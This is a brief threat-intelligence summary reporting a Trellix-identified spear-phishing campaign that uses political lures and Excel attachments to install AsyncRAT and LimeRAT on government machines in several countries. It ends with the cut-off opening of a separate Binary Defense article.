An ongoing spear phishing campaign believed to have begun in 2021 has been identified by the Trellix research team, with the most recent attack occurring in March of 2022. The threat actors involved in the campaign are targeting government entities from Afghanistan, India, Italy, Poland, and the United States. Political subject lines are used to catch the potential victim’s attention, and within the email is a malicious attachment or URL. The attachment or URL, if clicked on, will open an Excel sheet that causes a Remote Access Trojan (RAT) to be installed on the victim’s machine. The two RATs being observed in this campaign are AysncRAT and LimeRAT; both will maintain persistence and develop a connection with a Command and Control (C2) server. In an effort to exfiltrate data, both RATs performance malicious actions such as taking screenshots, capturing keystrokes, recording credentials/confidential information, and adding infected systems to botnets. Trellix researchers concluded that the spear phishing email originates from Southern Asia, and further hypothesized that the threat actors reside somewhere in that general area.
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense Russia’s invasion of Ukraine increased